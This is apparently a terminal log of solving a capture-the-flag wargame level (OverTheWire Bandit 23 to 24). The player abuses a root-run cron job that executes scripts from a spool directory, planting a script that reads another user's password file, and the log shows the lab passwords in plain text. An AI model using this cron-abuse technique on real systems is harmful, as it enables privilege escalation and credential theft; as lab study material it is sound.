ssh bandit23@bandit.labs.overthewire.org -p 2220
                         _                     _ _ _   
                        | |__   __ _ _ __   __| (_) |_ 
                        | '_ \ / _` | '_ \ / _` | | __|
                        | |_) | (_| | | | | (_| | | |_ 
                        |_.__/ \__,_|_| |_|\__,_|_|\__|
                                                       
bandit23@bandit.labs.overthewire.org's password: QYw0Y2aiA672PsMmh9puTQuhoz8SyR2G

bandit23@bandit:~$ ls -la /etc/cron.d
total 56
drwxr-xr-x   2 root root  4096 Oct  5  2023 .
drwxr-xr-x 106 root root 12288 Oct  5  2023 ..
-rw-r--r--   1 root root    62 Oct  5  2023 cronjob_bandit15_root
-rw-r--r--   1 root root    62 Oct  5  2023 cronjob_bandit17_root
-rw-r--r--   1 root root   120 Oct  5  2023 cronjob_bandit22
-rw-r--r--   1 root root   122 Oct  5  2023 cronjob_bandit23
-rw-r--r--   1 root root   120 Oct  5  2023 cronjob_bandit24
-rw-r--r--   1 root root    62 Oct  5  2023 cronjob_bandit25_root
-rw-r--r--   1 root root   201 Jan  8  2022 e2scrub_all
-rwx------   1 root root    52 Oct  5  2023 otw-tmp-dir
-rw-r--r--   1 root root   102 Mar 23  2022 .placeholder
-rw-r--r--   1 root root   396 Feb  2  2021 sysstat

bandit23@bandit:~$ cat /usr/bin/cronjob_bandit24.sh
#!/bin/bash

myname=$(whoami)

cd /var/spool/$myname/foo
echo "Executing and deleting all scripts in /var/spool/$myname/foo:"
for i in * .*;
do
    if [ "$i" != "." -a "$i" != ".." ];
    then
        echo "Handling $i"
        owner="$(stat --format "%U" ./$i)"
        if [ "${owner}" = "bandit23" ]; then
            timeout -s 9 60 ./$i
        fi
        rm -f ./$i
    fi
done

bandit23@bandit:~$ mkdir /tmp/ra6narok1
bandit23@bandit:~$ cd /tmp/ra6narok1
bandit23@bandit:/tmp/ra6narok1$ vim ra6narok1.sh

#!/bin/bash
cat /etc/bandit_pass/bandit24 > /tmp/ra6narok1/password.txt
:wq

bandit23@bandit:/tmp/ra6narok1$ chmod o+x ra6narok1.sh
bandit23@bandit:/tmp/ra6narok1$ chmod o+w .

bandit23@bandit:/tmp/ra6narok1$ ls -al
total 10292
drwxrwxrwx    2 bandit23 bandit23     4096 May 19 05:11 .
drwxrwx-wt 1471 root     root     10526720 May 19 05:39 ..
-rw-rw-r--    1 bandit23 bandit23        0 May 19 05:11 password.txt
-rwxrwxrwx    1 bandit23 bandit23       73 May 19 05:09 ra6narok1.sh

bandit23@bandit:/tmp/ra6narok1$ touch password.txt
bandit23@bandit:/tmp/ra6narok1$ chmod o+w password.txt
bandit23@bandit:/tmp/ra6narok1$ cp ra6narok1.sh /var/spool/bandit24/foo
bandit23@bandit:/tmp/ra6narok1$ ls -l
total 8
-rw-rw-rw- 1 bandit23 bandit23 33 May 19 05:44 password.txt
-rwxrwxrwx 1 bandit23 bandit23 73 May 19 05:09 ra6narok1.sh
bandit23@bandit:/tmp/ra6narok1$ cat password.txt
VAfGXJ1PBSsPSnvsjI8p759leLZ9GGar  <-----PASSWORD
